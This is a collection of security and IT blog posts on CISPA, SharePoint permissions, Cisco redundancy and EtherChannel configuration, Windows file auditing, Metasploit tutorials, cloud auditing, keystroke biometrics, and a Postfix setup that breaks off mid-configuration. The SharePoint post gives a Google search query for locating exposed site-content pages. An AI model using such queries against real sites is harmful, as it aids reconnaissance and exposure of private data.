“On Thursday, April 18, I voted no on H.R. 624, the Cyber Intelligence Sharing and Protection Act (CISPA). This year’s version includes marginal improvements over last year’s bill, which I also opposed, but these changes don’t go far enough to protect people’s private data, and many of the bill’s most significant problems remain unaddressed. Like last year, the bill overrides federal and state privacy laws and contracts. It exempts private entities from all federal and state liability when they share “cyber threat information” with the federal government—a term broadly defined to mean any information “directly pertaining to [a] threat to [] a system or network,” which could include your personally identifiable information, such as e-mails.

Under CISPA, companies are actually prohibited from making legally binding commitments to protect users’ personal data and e-mail. Without facing liability, companies have no means of assuring customers or employees that they will follow through on their privacy agreements, which means companies cannot easily compete in the area of user privacy. House leadership killed my bipartisan amendment to fix this problem, denying it a full vote on the House floor. My simple, quarter-page amendment merely asserted that CISPA’s liability exemption did not give companies authority “to breach a contract with another party.” It certainly would have passed unanimously or almost unanimously. By rejecting this amendment, the Committee on Rules voted to void private contracts and undermine the Rule of Law.

The bill also inappropriately allows the government to use the information it receives from private entities for purposes other than cybersecurity, such as protecting individuals generally “from the danger of death or serious bodily harm,” investigating and prosecuting certain crimes, and protecting minors. And the government may search through the information it receives to find specific information pertaining to these items, trampling on our Fourth Amendment right to be secure against unreasonable searches and seizures. Rep. Jared Polis offered an amendment, which I cosponsored, that would have ensured the government could use information shared with it under CISPA only to prevent imminent cyber attacks, but again, the Committee on Rules rejected this important change.

Cybersecurity is a real concern for the federal government and many public and private entities. But CISPA goes far beyond what is necessary to ensure the government and the private sector have the information and tools needed to protect against cyber threats. Just a few simple changes (many of which were offered as amendments but rejected by the Committee on Rules) would have made CISPA more protective of your privacy and civil liberties while still reducing legal barriers to timely sharing of actual cyber threat intelligence. House leadership rejected these changes without even permitting a vote on the amendments.

H.R. 624 passed 288-127.

Justin Amash FISA

“On Tuesday, April 16, I voted yes on the motion to suspend the rules and pass H.R. 1163, the Federal Information Security Amendments Act of 2013. The bill deals with cybersecurity for federal information systems. (This bill is not CISPA, which I opposed.) Among other things, the bill directs federal agencies to implement information security programs that include automated and continuous system monitoring, and to conduct routine threat assessments. According to the Committee on Oversight and Government Reform, many federal agencies are not adequately protected against real-time threats and have failed to incorporate modern technological developments into their information system security. The bill helps address these problems. H.R. 1163 passed 416-0.”

- Office of Justin Amash @mail.house.gov

The post Justin Amash CISPA and FISA appeared first on Mafia Security.

Main issues regarding security of SharePoint deployments:

Organizations have been adopting SharePoint at a pace which tends to outpace security measures. As always, adopting convenient tools is going to outpace adopting security measures which restrict actions by nature. Striking a balance between accessibility and restrictiveness is the goal of any well thought out and implemented security policy. SharePoint’s enables users to easily create sites in order to share data, which means that decentralization is the name of the game. Decentralized environments are often outside the scope of influence of IT/Security administrators. Instead of having to secure particular folders via access control, the security apparatus now has the problem of not just securing existing and future SharePoint sites, but also locating these sites.

Another issue is the complex permissions administration which is more complex than NTFS comparatives.   Access control decisions are left to the data’s owners through the SharePoint Permissions workflow, these may conflict with enterprise-level access policies. A Permissions workflow enables specific users to perform specific actions or see specific things based on their function. An Author can automate administration by creating a route that allows a user to perform a new task based on the status of a completed or existing task.

Resource auditing is a challenge in SharePoint, to be able to see which users took what action on data.  Current built in auditing capabilities are limited in terms of scalability across sites and platforms as data be copied and transmitted to file shares, email and so on without an audit trail that can cross sites. An Administrator may be able to audit data on one site, but as that data is transmitted to another site or platform, auditing software has difficulty continuously monitoring and corroborating that data which has left the current site.

How a hacker can glean information from publically available SharePoint resources:

Google hacking:

Type: inurl:”/_layouts/viewlsts.aspx” into Google and view results, this basic technique shows all searchable sites which have their View All Site Content pages exposed externally. There are other commands that can expose user information, roles, personal information, account SIDs,  Emails, site administrator etc.

Inurl is a Google string to restrict the results to those with all of the query words in the URL.

Measures to SharePoint Security (from the top down):

1.      Securing the Farm

A SharePoint farm is a collection of SharePoint servers or SQL servers working together to provide SharePoint services in support of a site. Services running within the farm regulate the allocation of services to manage architecture and performance.  Farm security is relatively simple given that the crux of SharePoint is its distributed content. Permissions are simple, there are farm admins and there are other users who aren’t admins. A farm admin has full control over the farm which includes web apps, managing services and backups. These tasks can be found in Central Administration, the web-based administration interface.  The Farm administrator role is set via AD, by adding users/groups to the farm administrators group. Certain actions also require the farm administrator to be a local administrator on the server(s) running the Central Administration web application.

2.      Granting PowerShell Access

PowerShell provides command line access to administer and automate SharePoint functions that can also be done from the Central Administration web application. Granting users the ability to run PowerShell commands, the Add-SPShellAdmin cmdlet, which grants necessary permissions on SharePoint servers/farm. When using the –database switch, a user can then be given permissions to the configuration database and the content database.

3.      Securing Web Applications (via basic or digest authentication) & Zones

Web applications are the user’s entry point into SharePoint, which means it is also an entry point for attackers. Web applications consist of one or more IIS websites, controlling how users are authenticated (if authentication is set). IIS is notorious for security issues, so this measure of security is quite necessary – not allowing anonymous access.  Using multiple web applications as a segmentation measure is also prudent. Using multiple web applications allows for isolation of content or sets of users, such as an extranet.

Using zones is also valuable. When a web application is created, the default zone is created. The web application can then be extended to create other zones up to a maximum of 5 zones: Default, Intranet, Internet, custom, extranet.

Each zone is effectively a new IIS Website, and each site points to an Application pool, also called extensions. Essentially, users can access different URLs with varying levels of security depending on which URL the user uses – by using zones to enforce access and policy conditions for groups of users.

This allows you to set “Windows Authentication” for Intranet, “Form Authentication” for the extranet and “Form Authentication with anonymous access” for Internet.

Adjusting permissions to content within a web application requires changing the user policy for the web application – through Central Administration > Manage web applications > select the web application and select User Policy. Permissions can then be added or denied. This is the only way to deny a user access to SharePoint as it takes precedence over all other permissions. For granting permissions, it is generally better to grant them at the individual site collection level.

4.      Anonymous Access:

To adjust which permissions and anonymous user receives, perform the following:

• Per object, go to the Site Actions menu and use the objects context menu (aka edit control block).
• If necessary, click the stop inheriting permissions box
• Select Anonymous Access
• Select the desired permissions to grant anonymous users

5.      Securing site collections:

A site collection is also referred to as a top level site or root site. It contains configuration settings that apply to all the sites within it, such as quotas, search settings, recycle bin settings, etc. As mentioned previously, permissions can be assigned at the web application level and individual site level. Typically users are authenticated at the web application level and authorization (what users can access) is performed at the individual site collection level. Therefor it is advisable to assign permissions via the individual site collections for day to day management.

When permissions are set on a collection, they are inherited by all websites, lists, libraries, folders and items in that site collection – this can be stopped if needed. If a user attempts access to a site to which they have not been granted access, it is possible to enable the user to request access from the access denied error page, similar to a firewall.

Within a site collection, the highest level of access belongs to the site administrator. A site administrator is assigned by the farm administrator (there can be 2 site administrators per site). A site administration can then add as many additional local admins as needed. Note that each site collection is administered separately, so allowing trained users access to administrative tasks is convenient.

6.      Enabling Groups:

Groups in SharePoint are similar to other systems, however these groups are specific and limited to their site collection. Do not confuse this with AD groups, as one AD group permission can be assigned to multiple site collections. Each site has its own built-in permissions levels which can be assigned to users or groups, these are similar to NTFS permissions (Full Control, Read, etc) and include some others such as Design. Custom permission levels can also be created for more granular access control.

Permissions within a site collection can be granted by:

• Adding one or more users to a SharePoint group and granting that group permissions
• Adding one or more users to an AD security group and granting that group permissions
• Adding one or more users to an AD security group, adding the AD group to a SharePoint group, and granting the SharePoint group relevant permissions
• Granting permissions directly to users, without the use of groups.

*Permissions are assigned by going to the Site Actions menu within the site collection, selecting Site Permissions > Grand Permissions > select users, SharePoint groups or AD security groups.

Enterprise wide visibility and control for compliance purposes for SharePoint Security:

SharePoint uses its own proprietary authorization model stored in a SQL database within the SharePoint installation. Therefor authorization is done on a per site basis, and a comprehensive view of access rights across all sites is difficult to get. There are a number of ways to simplify and address this issue. One is to manually extract all the entitlement (permissions) reports from each site and create a report. There are third party vendors such as Nintex, Idera, Quest Software, etc that provide tools for enterprise wide visibility and reporting.

Another approach involves using a centrally managed service from a third party vendor to take advantage of the .NET role provider interface (SharePoint is a .NET framework-based application) and enable external-based authorization solutions. This can replace or be used in conjunction with SharePoint’s internal authorization scheme. *Cost is a factor with this approach as solutions can be expensive.

The post SharePoint Security Concepts & Application appeared first on Mafia Security.

We’ll start by talking about a relatively simple concept of redundant power, but you might find that this is one of the most neglected parts of a network design. I’ve encountered many dead switches in wiring closets that probably could have lived a longer life if the proper power protection was implemented when the switch was installed. It’s also important to note that most networking devices were not built to be rebooted very often, so when a power loss occurs for a split second and reboots all your switches, this isn’t exactly healthy for the devices. It amazes me sometimes how people will drop thousands of dollars on new network equipment and not bother to protect this new investment with a solid Uninterrupted Power Supply. (UPS) The concept here is pretty simple, when a power loss occurs in the building; UPSs in each wiring closet take over with a battery backup to keep this equipment running. I’m finding that this is only going to become more important as power over Ethernet (PoE) devices gain in popularity. A great example here is a network that is running voice over IP (VoIP) and maybe some wireless access points that get power from your PoE switches in each closet. If a power blip occurs and you’re not running UPSs in each of your wiring closets, all of your phones and wireless access points will reboot as well once the power to the building is fully restored. This could add up to be a LOT of downtime if there is a storm that keeps knocking out power for a few split seconds every hour. If it’s in your budget, I always recommend going with UPSs that are IP enabled. This means there is either a built in Ethernet port on the device or a separate module you can install in it to remotely manage the device over the network. It’s also very cool to have the device send you an email when it needs a replacement battery or send an SNMP trap to your monitoring server, which leads me to the importance of monitoring.

You can build all the redundancy and fault tolerance into your network that you want, but if you are not monitoring for failures and acting on those alerts, you’re only prolonging the outages that will eventually occur. There are many ways to do this, but the most popular ways I’ve seen are using SNMP (Simple Network Management Protocol), Syslog, and believe it or not, a simple ping. PRTG, Solarwinds, and Nagios are a few programs that come to mind for SNMP monitoring and I know there are a few freebees for Syslog monitoring as well. Here is a quick breakdown of how you can setup SNMP on a Cisco switch. (The commands are the same or similar for other devices)

SNMP works by using community names. If your device is programmed with the same community name that you have setup on your SNMP monitoring server you will see statistics and data populating in your monitoring application. You’ll also need to make sure UDP ports 161 and 162 are allowed on your network before deploying this. Here is a config snippet to get you started with some notes.

 Switch(config)#snmp-server community EXMAPLE RO

The “EXAMPLE” part of this command is the actual community name string that will need to match on whatever program you’ll be using to poll SNMP data. The “RO” portion signifies that this is a read-only SNMP community string, so you can’t actually send commands to the device using SNMP, just read data. You can optionally add a number at the end of this command to bind this string to an access-list number that can either be a standard or extended list of access-lists. This will make it so only the IP addresses you allow in your access-lists will be allowed to poll SNMP data from the device for monitoring.

Another feature that is built into every Cisco switch that is often neglected is spanning tree protocol and I would be crazy not to include a short discussion of this in my guide, so here goes. Spanning tree protocol is a nice insurance policy to make sure your network is running loop free, so I highly recommend using it. It’s also a nice way to purposely build in some redundant links into your network. There is a ton of information on spanning tree protocol and how you can fine tune it, but I’ll concentrate on the basics. By default, almost all modern Cisco switches have PVST (Per VLAN Spanning Tree) enabled. This makes use of the 802.1D standard or in other words, a standard STP instance for each VLAN. With regular STP, it’s possible for us to have to wait 50 seconds for spanning tree to reconverge on the network from a link failure. This is long enough for phones to reset, web pages time out, and the phones to start ringing on your desk with angry users wondering what is going on. This was once an acceptable amount of time for a network hiccup in the middle of the day, but modern networks require much more uptime than ever before and this amount of downtime is often not acceptable. Now if you remember to enter this one command below on every switch in your network you can drastically speed up your spanning tree convergence time.

 Switch(config)#spanning-tree mode rapid-pvst

This command enables rapid spanning tree (802.1w) on your switch. Once this is turned on you’re only looking at about a 3 second delay for spanning tree to converge from a link failure. Another thing that is often left out when deploying switches is statically setting the root switch in the spanning tree topology. Let’s bring up an example to show what I’m talking about. Maybe we are a growing network and we are constantly adding switches to new parts of the building and I have not decided on what switch I want to be my root bridge in the spanning tree topology. Now by default the switch that has the lowest MAC address will be elected the root bridge in the topology which is often the oldest switch in the network. This is a MAJOR problem, because if my network has hundreds of VLANs this means I have hundreds of spanning tree instances for the root bridge to keep track of. If the oldest switch in the network can’t handle this you’ll experience major instabilities on the network. This is why it’s very important to carefully plan what switch will be the root bridge in the network and then statically set its priority. You can accomplish this with the following command:

Switch(config)#spanning-tree vlan [VLAN # or range] priority 0

I always set mine to the lowest (best) priority to eliminate any consequences of somebody who brings in a switch that is set to a higher priority, but please note that if another switch appears on the network with the same priority of 0 you’re back at a lowest MAC address determination for the root bridge.

So now you’ve got some redundant links in your network and your monitoring software will tell you when a link has failed over so you can make the necessary adjustments to restore that link, but what if we want to minimize downtime even further by using link aggregation for sub-second failover on our redundant links? This is where the use of Etherchannels can really shine. In short, an Etherchannel is a grouping of physical links on a switch to form one virtual link. If you’ve ever worked with T1s to setup multi-link bundles, the concept is very similar to this in that we are load balancing across two separate physical links.

If spanning tree protocol is setup correctly on your network you’ll see something that looks like the figure below with one port in the “blocking” state where traffic is not being forwarded on this link.

When you run the “Show spanning-tree” command you will see this link’s status as “BLK.” Let’s bundle these two links together into an Etherchannel using the following commands.

Both ends we will have identical config, because we chose ports that are the same port number on each side. This is a nice way to add some consistency to your network and be able to easily predict how the other end is setup in troubleshooting any issues.

First we’ll create the virtual interface by simply typing in interface and then the string “port-channel” with a number directly after it.

Switch(config)#interface  port-channel1

*The range of numbers you can use will be dependent on what model of switch you are configuring and might vary between IOS versions.

Now we will be dropped into interface configuration mode where we will need to add the configuration we need for our switch to switch link just like we would if it was a physical interface. Since this is a switch to switch link I’m going to configure it as a trunk port, so it can carry traffic for multiple VLANs across it.

Switch(config-if)#switchport mode trunk
Switch(config-if)#switchport nonegotiate

From here, this should look quite familiar. I like to use the “switchport nonegoatiate” command after setting a link as a trunk to disable DTP. (dynamic trunking protocol) Just make sure that if you configure it this way, both ends of your configuration are identical, because this command forces you to set a port to trunk manually instead of relying on a negotiation to take place between switches. I’ve heard mixed things on whether or not this actually speeds up your convergence time, but I prefer to configure trunks this way anyways, because I generally don’t like relying on the network to automatically do anything and it’s nice to eliminate extra overhead from DTP packets.

Our next step is to assign physical interfaces to our newly created port-channel interface. I’ll select both my interfaces at once using the range command shown below and configure both interfaces in one swipe.

Switch(config)#interface range GigabitEthernet1/0/1-2

Next make sure that the configuration on your physical interfaces matches what we just applied to the port-channel interface. If it doesn’t, there could be very unpredictable issues occurring over the link once it is enabled as an Etherchannel. Some IOS fills in the configuration on your virtual interface to all of the physical interfaces assigned, but not all IOS does this, so make sure to check this before moving on.

Switch(config-if-range)#switchport mode trunk
Switch(config-if-range)#switchport nonegotiate

Now we’ll enter our channel-group configuration.

Switch(config-if-range)#channel-group 1 mode on

We start with the string, “channel-group” to tell the switch that the selected physical interfaces will be part of a virtual interface. Next we’ll need to enter the number that we used earlier in our port-channel interface to bind this physical interface to that port-channel interface.

For the next part of this command I used “mode on” to tell the physical interfaces to unconditionally become an Etherchannel. You have a few options here, but the short story is that PAgP (Port aggregation protocol) or LACP (Link Aggregation Control Protocol) can be configured to negotiate an Etherchannel. Again, similar to configuring trunk ports, my preference here is to not use a negotiation protocol unless required, so since this is just a switch to switch link, a negotiation protocol really isn’t needed. Most Cisco documentation I have read will suggest that you use their proprietary PAgP to form Etherchannels, but from what I understand this is only recommended due to the fact that PAgP will help you out and shutdown links if a configuration mistake is made. So the key here is making sure that both ends of the Etherchannel have identical configuration. I have had a lot of success with selecting “mode on” for Etherchannels.

After these steps are complete, you should be able to do a “no shutdown” on your physical interfaces and see the Etherchannel come up. Spanning tree will not block the port since it is now a single logical link and you should have sub-second failover times in the event that one of the links goes down. You can run a quick “show etherchannel summary” command from enable mode to verify that both ports are up in the Etherchannel. Ports that are “up” in the Etherchannel will be labeled with a “P” next to them from this output.

Now your topology should logically look like this:

Make sure to note what load balancing method your switches are using by default for Etherchannels, as you may need to adjust this depending on the placement in the network. Many of the newer models will allow you to load balance using source/destination MAC address, source/destination IP address, and layer 4 ports. I recommend load balancing by source or destination IP address when you can, but know that this is not always the best configuration. For example, if you have an Etherchannel going to a heavily utilized server in your organization and you load balance by destination IP address you might find that the majority of your traffic only traverses one link since users are all trying to get to the one IP address on the other end of your Etherchannel, which is your server’s IP address. It’s also important to note that Etherchannel load balancing is a global configuration, so once you choose a load balancing method, this method will be used by all Etherchannels configured on the switch.

Here is the command to adjust the load balancing method:

Switch(config)#port-channel load-balance ?

                          Dst-mac         Dst Mac Addr

                          Src-mac         Src Mac Addr

And you can verify what load balancing is currently running with the “show etherchannel load-balance” command.

Now the next time you are tasked with building a network from the ground up or implementing some high availability features into your network, keep these tips and configuration examples in mind. Remember that failure points within any network are a matter of “when” and not a matter of “if.” The famous saying of “even the best laid plans…” might come back to bite you if the proper monitoring, countermeasures against link failure and electrical power protection are not built in.

References for Cisco Fault Tolerant Network Design:

Cisco Fault Tolerant Network Design [Review Fault Tolerant Network Design, by C. Walters]. (2013, March). Retrieved from Hakin9 website: http://hakin9.org/how-to-detect-system-intrusions/

The post Cisco Fault Tolerant Network Design appeared first on Mafia Security.

First, there are both pros and cons with using Windows security auditing.

One of the benefits of Windows security auditing has verse third party software is the ability to tell the system administrator when a user tries to access a file they do not have authorization. There may be an ongoing occurrence for John Doe, from marketing, ‘accidentally’ trying to access a Human Resources share; however, if this event occurs multiple times with different credentials or circumstances, you can suspect John Doe is doing something he should not be.

The first big downside is not being able to tell what has been changed in a file. In the more expensive options like nCircle and Tripwire, you know exactly what has been changed down to a granular level. Secondly, is if configured improperly, your security event logs on the server will be too large to parse limiting the ability to make sense of audit logs.

Windows security auditing allows IT professionals and IT auditors with the knowledge of the specific directories, files including executables, which has been changed, modified or deleted. Windows security auditing will notify you of this event by telling you who, what, where, and when.

You will need some way to monitor your event logs. We use Splunk (www.splunk.com) to parse and alert on our application, security and event logs. All we had to do was enable Windows security auditing and configure it on the appropriate folder structure. From day one, we were getting the information we needed and exceeded the PCI DSS requirements to stay in regulation.

Windows security auditing is not enabled by default; however, it is very simple to set up.

On your Windows server, go to Local Security Policy > Security Settings > Local Policies > Audit Policy.

Enable security auditing, and then right click on the file or folder you want to monitor. Select Properties > Security tab > Advanced > Auditing tab > Edit.

I would advise experiment with a small set of files and folders while watching the security event log. You will see the different access notifications for the file set you selected.

Most importantly, monitor for the following events:

• Successful:
  • Create files / write data
  • Create folders / append data
  • Write attributes
  • Write extended attributes
  • Delete subfolders and files
  • Delete
  • Failed:
• All failed attempts to access monitored files and folders

This is useful to show employees who are routinely trying to access files and folders they do not have permissions to view.

There are some important event IDs in Windows that are associated with Windows security auditing. The most important are

• Event ID 4663 – A file/folder is created
• Event ID 4656 – A file/folder is changed and saved
• Event ID 4656 – A file/folder is deleted. You will see the exact wording “deleted” in the message area of the event.

A list of more Windows security auditing event IDs can be found here: http://support.microsoft.com/kb/947226

As an example, you could use Windows security auditing on the following folders.

(This is not an all-inclusive list)

• C:\Bin\*
• C:\Users\*
• C:\Program Files\*
• C:\Program Files (x86)\
• C:\Windows\System32\dns\*
• C:\Windows\System32\*.exe
• C:\Windows\Security
• D:\Program Files\*
• D:\Logs\*

The settings for Windows security auditing can be built into GPO packs and pushed out as part of your global policy. Global Policies along with Microsoft Deployment Toolkit are a great combination to ensure your security auditing settings are applied consistently.

There are benefits to spending the money for software like Tripwire or nCircle, but take a look at Windows security auditing. You may just have your solution built into your server.

The post Windows Security Auditing for File Integrity Monitoring appeared first on Mafia Security.

Would you like to be featured in one of these Hakin9 releases and be seen by over 100,000 readers? Become a Mafia Security Author to find out more!

DEFENSE PATTERN
How to Use Metasploit for Security Defense
By Justin C. Klein Keane, an Information Security Specialist working at the University of Pensylvania
If you’ve ever taken any training about penetration testing, or read almost any book or online article about the trade, you’ve heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task. Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult.

How to Work with Metasploit Auxiliary Modules
By Abhinav Singh, the author of “Metasploit penetration testing cookbook,” a contributor of SecurityXploded community
The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirement. Any programmer can develop his own module and port it easily into the framework.

How to Explore the IPv6 Attack Surface with Metasploit
By Mike Sheward, a security specialist for a software-as-a-service provider based in Seattle
IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.

HAKIN9 EXTRA
How to Use The Mac OS X Hackers Toolbox
By Phillip Wylie, CISSP, IAM
When you think of an operating system to run pen testing tools on, you probably think of Linux and more specifically BackTrack Linux. BackTrack Linux is a great option and one of the most common platforms for running pen testing tools. If you are a Mac user, then you would most likely run a virtual machine of BackTrack Linux. While this a great option, sometimes it is nice to have your tools running on the native operating system of you computer.

NETWORK SCANNING
How to Scan with Nessus from within Metasploit
By Michael Boman, a penetration tester, delivering courses in security testing and secure development
When you perform a penetration test with Metasploit you sometimes import vulnerability scanning results for example Nessus Vulnerability Scanner. Usually you start the scan externally from Metasploit framework and then import the results into Metasploit. What you can do is to manage the Nessus scan from within Metasploit and easily import the results into your process. But let’s start from the beginning.

How to Use Multiplayer Metasploit with Armitage
By Michael Boman, a penetration tester, delivering courses in security testing and secure development
Metasploit is a very cool tool to use in your penetration testing: add Armitage for a really good time. Penetration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort.
Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

EXPLORING DATABASE
How to use Sqlploit
By George Karpouzas, co-founder of WEBNETSOFT, a software development and IT Services company, specialized in application security
Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured. Someone with access to this information could have control over a company’s or an organization’s infrastructure.

http://www.hakin9.org/metasploit-open-tutorials-free-download/

The post Step by Step Metasploit Free Tutorials appeared first on Mafia Security.

Cloud computing comes into focus only when you think about what IT always needs a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software (Knorr & Gruman, 2009). Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT’s existing capabilities (Knorr & Gruman, 2009).

SaaS examples would be Salesforce.com is by far the best-known example among enterprise applications, but also HR apps and ERP with players such as Workday (Knorr & Gruman, 2009). Closely related to SaaS, Web service providers offer APIs that enable developers to exploit functionality over the Internet, rather than delivering full-blown applications (Knorr & Gruman, 2009). One example would be full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services (Knorr & Gruman, 2009).

PaaS a SaaS variation form of cloud computing delivers development environments as a service (Knorr & Gruman, 2009). You can build your own applications for the cloud infrastructure and through the Internet or cloud; your users can access the provider’s servers (Knorr & Gruman, 2009). Like Legos, these services are constrained by the vendor’s design and capabilities, so you do not get complete freedom, but you do get predictability and pre-integration (Knorr & Gruman, 2009).

Positives of Auditing Cloud Computing:

The City of Los Angeles CTO Randi Levin is praising the ability to go cloud based (Kaplan, 2010). Like most of the country, Los Angeles’ wallet is very strapped and even emergency services are facing cuts (Kaplan, 2010).

The IT department is no different with losing almost 33 percent of their annual budget and 38 of their employees (Kaplan, 2010). What made Randi Levin look into cloud computing was the need of a faster, efficient email service (Kaplan, 2010). Not to mention their datacenter would need $30 million to renovate to current standards and is 20 stories below a car wash with flooding a major concern (Kaplan, 2010).

Los Angeles implementation would save Los Angeles about $6 million dollars over the next five years; however, speculation on the security and privacy of emails remains (Kaplan, 2010). Levin guarantees the skeptics “when you look at companies like Google and Microsoft, they have 500 or 600 security specialists that all they do is live and eat and breathe this” (Kaplan, 2010). What is important when dealing with cloud computing is the service-level agreements to ensure the security model C.I.A. is upheld (Kaplan, 2010).

Negatives of Auditing Cloud Computing:

With the City of LA, there were some disbelievers, pointing out some interesting issues regarding government involvement with these corporations. When Google was compromised by alleged Chinese hackers, they had “enlisted” the NSA to investigate the issue granting them access to their network (Nakashima, 2010). The NSA is famous for their warrantless wiretaps and surveillance programs on foreign and domestic criminals (Nakashima, 2010). This gives people good reason to question if ‘big brother’ could or would snoop around any corporate, or in this article, city officials’ emails.

The biggest concerns about cloud computing are security and privacy. Users might not be comfortable handing over their data to a third party (Ahluwalia, n.d.). This is an even greater concern when it comes to companies that wish to keep their sensitive information on cloud servers (Ahluwalia, n.d.). While most service vendors would ensure that their servers are kept free from viral infection and malware, it is still a concern considering the fact that a number of users from around the world are accessing the server (Ahluwalia, n.d.).

Privacy is another issue with cloud servers (Ahluwalia, n.d.). Ensuring that a client’s data is not accessed by any unauthorized users is of great importance for any cloud service (Ahluwalia, n.d.). To make their servers more secure, cloud service vendors have developed password protected accounts, security servers through which all data being transferred must pass and data encryption techniques (Ahluwalia, n.d.). After all, the success of a cloud service depends on its reputation, and any sign of a security breach would result in a loss of clients and business (Ahluwalia, n.d.).

Unlike a bank if it is robbed not, many customers are effected and the money is guaranteed to be covered; although, when it comes to intellectual property there is no way to recover if there is a breach. I believe really the only way to pick a ‘trusted’ provider would be based on the controls they have in place for their own internal auditing and as the number of controls are in place, the price of the service will go up.

Effect on IT Auditing Cloud Computing:

One of the main purposes of having an internal audit is to find mistakes within your business not to point fingers but to reach the common goal of the overall businesses success.  Whether you choose IaaS, PaaS, or SaaS you are leaving the controls in the hands of another company whom may not have your company’s best interests in mind.

In addition, some of the audit processes may not be able to be completed simply because your company does not, and should not, have the necessary access to the overall infrastructure to be able to run the tests. If they allowed you full access, I would be worried about the type of attacks another entity could do on the network against my own company.

In the midst of all the negatives against auditing cloud computing when it comes to internal auditing, not having to worry about government regulations such as some SOX and PCI DSS compliances because you have selected a cloud computing option will make auditing much easier for your organization.

References of Auditing Cloud Computing

Ahluwalia, S. (n.d.). Top 5 Disadvantages Of Cloud Computing. Retrieved from http://www.cloudcomputingtechie.com/top-5-disadvantages/
Kaplan, D. (2010). Parting clouds: Los Angeles sees benefits moving some IT operations to the cloud. SC Magazine.

Knorr, E., & Gruman, G. (2009, December 23). What cloud computing really means. Retrieved from http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031

Managing Risk on the Journey to Virtualization and the Cloud. (2010, August). Enterprise Management Associates.

Nakashima, E. (2010, February 4). Google to enlist NSA to help it ward off cyberattacks. The Washington Post. Retrieved from http://www.washingtonpost.com/wp-dyn/content/article/2010/02/03/AR2010020304057.html

The post Auditing Cloud Computing appeared first on Mafia Security.

TypeSense is an authentication solution based on the science of typeprint recognition that uses keystroke dynamics to accurately identify a user by the way they type characters across a keyboard. Keystroke Dynamics technology extracts the distinctive characteristics found in typed sequences of characters, and creates a statistically unique signature from the typing patterns of a person. These distinctive features include the duration for which keys are held and the elapsed time between successive keystrokes. This type of software runs in the background and constantly monitors your key stokes, learns your style, and can detect if your computer’s been hijacked. (Deepnet Security)

TypeSense, and other similar products, do not do away with the need for passwords but instead protects them. This is a two-phase authentication method. There are a number of benefits to using keystroke dynamics technology. It’s relatively user-friendly and low-cost. It’s mobile and can be used to access your online accounts from anywhere and can be easily integrated in your existing authentication infrastructure.

One of the major downsides to this technology is that throughout the day your typing style can vary greatly depending on whether you are tired, distracted, angry, medicated, or any number of other circumstances. These variations can cause the software to make false positive or negative errors.

Although it requires a higher level of skill, keystrokes can be hacked. At DEFCON: 17, Andrea Barisani and Daniele Bianco demonstrated how to sniff keystrokes using unconventional side channel attacks. Wires in PS/2 keyboards leak information from the data wire into the ground wire which acts like an antenna. The leaked information about the keyboard strokes can be detected on the power outlet, as well as other wires on the same electrical system. By slicing open one of these lines, cutting the ground wire and attaching a probe, the line can be monitored and the signal isolated by filtering out the noise using software such as Scilab. The waves from the oscilloscope and the data can be streamed to the hacker’s computer where additional software is used to extract the victim’s keystroke information.

The research team, Ecole Polytechnique Federale de Lausanne was able to pick up electromagnetic radiation that is generated every time a computer keyboard is tapped by using an oscilloscope and an inexpensive wireless antenna, the team was able to pick up keystrokes from virtually any keyboard, including laptops with 95 percent accuracy. (PC World, 2013)

Although no security measure can ever be flawless, hacking keystrokes is more challenging, and can thus slow or stop many hackers and has so far proven to be a quite effective method of securing passwords.

References for Keystroke Dynamics:

DualShield Authentication : Keystroke Dynamics.” Two Factor Authentication | 2 FA | 2 Factor Authentication. Deepnet Security, n.d. Web. 19 Dec. 2012. <http://www.deepnetsecurity.com/tokens/bio/typesense/>.

DEFCON 17: Sniff Keystrokes With Lasers/Voltmeters – YouTube. YouTube. N.p., n.d. Web. 19 Dec. 2012. <http://www.youtube.com/watch?v=xKSq9efXmh8>.

McMillan, Robert. “A Way to Sniff Keystrokes From Thin Air | PCWorld.” PCWorld – News, tips and reviews from the experts on PCs, Windows, and more. N.p., 12 Mar. 2009. Web. 8 Mar. 2013. <http://www.pcworld.com/article/161166/article.html>.

The post Keystroke Dynamics Software appeared first on Mafia Security.

Environment:

• We are using Debian 6.0 Squeeze installed without GUI or system utilities on vmware workstation 9.0
• During install I configured Debian to use Separate /home, /usr, /var and /tmp partitions (this is an option).
• I suggest installing and configuring vim for the purpose of this guide, it makes life infinitely easier.

VIM setup:

user@debbie:~# sudo apt-get install vim
user@debbie:~# sudo vi /etc/profile

#add this to the last line so typing vi opens vim):

alias vi=’vim’

#then add functions to vim  – these are just some I like:

user@debbie:~# sudo Vi ~/.vimrc

set nocompatible
set fileformats=unix,dos
set number
set incsearch
set list
set showmatch
syntax on
highlight comment ctermfg=LightCyan
setwrap

Linux Email Server Setup

Step 1. Install Postfix:

(Make sure you’ve set your user up in the sudoers list, or are installing this from root)

user@debbie:~# sudo Apt-get install postfix postfix-tls sasl2-bin

# at the first screen, hit <Ok>

# Select ‘No Configuration’ so we can edit our configs manually and set this up as we want.

Step 2. Configure postfix

user@debbie:~# sudo cp /usr/lib/postfix/main.cf /etc/postfix/main.cf     #starting from scratch

user@debbie:~# sudo vi /etc/postfix/main.cf                #learn/love vi – you’ll thank me.

#Line 59: uncomment:

mail_owner = postfix

#line 76: uncomment and specify your servers fqdn (find fqdn by running hostname –fqdn at terminal)

Myhostname = debian.lonestar.com

#line 104: uncomment

myorigin = $mydomain

#line 118: uncomment

Inet_interfaces = all

#line 166: uncomment

mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain

# line 209: uncomment

